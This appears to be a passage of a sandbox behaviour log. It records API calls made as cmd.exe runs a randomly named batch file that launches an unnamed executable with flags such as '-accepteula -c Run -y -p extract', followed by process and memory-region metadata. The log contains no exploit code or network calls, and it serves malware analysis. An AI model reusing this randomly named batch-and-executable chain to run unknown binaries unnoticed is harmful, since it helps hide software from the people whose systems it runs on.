[0300.000] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.000] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd28580*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xbbf0d4, lpReserved=0x0 | out: lpBuffer=0xd28580*, lpNumberOfCharsWritten=0xbbf0d4*=0xc) returned 1 [0300.000] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xbbf0dc | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0300.000] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.000] GetFileType (hFile=0x3c) returned 0x2 [0300.000] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.000] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf0b4 | out: lpMode=0xbbf0b4) returned 1 [0300.000] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.000] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xbbf0cc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf0cc*=0x2c) returned 1 [0300.001] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xbbf0ec | out: _Buffer=") ") returned 2 [0300.001] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.001] GetFileType (hFile=0x3c) returned 0x2 [0300.001] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.001] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf0c4 | out: lpMode=0xbbf0c4) returned 1 [0300.010] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.010] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf0dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf0dc*=0x2) returned 1 [0300.011] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbf100 | out: _Buffer="\r\n") returned 2 [0300.011] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.011] GetFileType (hFile=0x3c) returned 0x2 [0300.011] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.011] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf0d8 | out: lpMode=0xbbf0d8) returned 1 [0300.011] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.011] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf0f0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf0f0*=0x2) returned 1 [0300.011] GetConsoleTitleW (in: lpConsoleTitle=0xbbec18, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0300.012] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0300.012] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0300.013] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0300.014] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0300.014] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0300.014] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0300.014] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0300.014] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0300.014] SetErrorMode (uMode=0x0) returned 0x0 [0300.014] SetErrorMode (uMode=0x1) returned 0x0 [0300.014] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1d8d0, lpFilePart=0xbbe724 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbbe724*="Desktop") returned 0x1d [0300.014] SetErrorMode (uMode=0x0) returned 0x1 [0300.014] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0300.014] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0300.014] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0300.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.014] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xbbe4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe4d0) returned 0xd1cb70 [0300.014] FindClose (in: hFindFile=0xd1cb70 | out: hFindFile=0xd1cb70) returned 1 [0300.014] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0300.015] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0300.015] GetConsoleTitleW (in: lpConsoleTitle=0xbbe9a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0300.015] InitializeProcThreadAttributeList (in: lpAttributeList=0xbbe8d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xbbe8b4 | out: lpAttributeList=0xbbe8d0, lpSize=0xbbe8b4) returned 1 [0300.015] UpdateProcThreadAttribute (in: lpAttributeList=0xbbe8d0, dwFlags=0x0, Attribute=0x60001, lpValue=0xbbe8bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xbbe8d0, lpPreviousValue=0x0) returned 1 [0300.015] GetStartupInfoW (in: lpStartupInfo=0xbbe908 | out: lpStartupInfo=0xbbe908*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Jou", _MaxCount=0x7) returned -3 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.015] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0300.016] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0300.016] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0300.016] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xbbe858*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbbe8a4 | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0xbbe8a4*(hProcess=0xb8, hThread=0xcc, dwProcessId=0x544, dwThreadId=0x908)) returned 1 [0300.022] CloseHandle (hObject=0xcc) returned 1 [0300.022] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0300.022] GetEnvironmentStringsW () returned 0xd1cdb0* [0300.022] FreeEnvironmentStringsA (penv="=") returned 1 [0300.022] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0301.086] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xbbe83c | out: lpExitCode=0xbbe83c*=0x1) returned 1 [0301.086] CloseHandle (hObject=0xb8) returned 1 [0301.086] _vsnwprintf (in: _Buffer=0xbbe924, _BufferCount=0x13, _Format="%08X", _ArgList=0xbbe844 | out: _Buffer="00000001") returned 8 [0301.086] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0301.086] GetEnvironmentStringsW () returned 0xd1cdb0* [0301.086] FreeEnvironmentStringsA (penv="=") returned 1 [0301.086] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0301.086] GetEnvironmentStringsW () returned 0xd1cdb0* [0301.086] FreeEnvironmentStringsA (penv="=") returned 1 [0301.086] DeleteProcThreadAttributeList (in: lpAttributeList=0xbbe8d0 | out: lpAttributeList=0xbbe8d0) [0301.086] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.086] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.107] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.107] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.108] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.108] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.108] SetConsoleInputExeNameW () returned 0x1 [0301.108] GetConsoleOutputCP () returned 0x1b5 [0301.108] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.108] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.108] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xbbf204, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0301.109] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0301.109] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.109] SetFilePointer (in: hFile=0xb8, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.109] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.109] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.109] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xbbf1d4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xbbf1d4*=0x0, lpOverlapped=0x0) returned 1 [0301.110] GetLastError () returned 0x0 [0301.110] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.110] GetFileType (hFile=0xb8) returned 0x1 [0301.110] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.110] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.110] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.110] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.110] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xbbf1d4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xbbf1d4*=0x0, lpOverlapped=0x0) returned 1 [0301.110] GetLastError () returned 0x0 [0301.110] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.110] GetFileType (hFile=0xb8) returned 0x1 [0301.110] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.110] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.111] longjmp () [0301.111] _tell (_FileHandle=3) returned 226 [0301.111] _close (_FileHandle=3) returned 0 [0301.111] CmdBatNotificationStub () returned 0x1 [0301.111] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.111] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.111] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.111] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.111] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.111] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.111] SetConsoleInputExeNameW () returned 0x1 [0301.111] GetConsoleOutputCP () returned 0x1b5 [0301.112] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.112] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.112] exit (_Code=1) Thread: id = 834 os_tid = 0xf2c Process: id = "83" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xdc1000" os_pid = "0xe4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5981 start_va = 0x460000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5982 start_va = 0x480000 end_va = 0x481fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5983 start_va = 0x490000 end_va = 0x4a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 5984 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 5985 start_va = 0x4f0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5986 start_va = 0x5f0000 end_va = 0x5f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 5987 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5988 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 5989 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5990 start_va = 0x7f370000 end_va = 0x7f392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f370000" filename = "" Region: id = 5991 start_va = 0x7f399000 end_va = 0x7f399fff entry_point = 0x0 region_type = private name = "private_0x000000007f399000" filename = "" Region: id = 5992 start_va = 0x7f39c000 end_va = 0x7f39efff entry_point = 0x0 region_type = private name = "private_0x000000007f39c000" filename = "" Region: id = 5993 start_va = 0x7f39f000 end_va = 0x7f39ffff entry_point = 0x0 region_type = private name = "private_0x000000007f39f000" filename = "" Region: id = 5994 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5995 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5996 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 5997 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5998 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 5999 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 6000 start_va = 0x610000 end_va = 0x611fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6094 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 6095 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6096 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6097 start_va = 0x75130000 end_va = 0x7521ffff 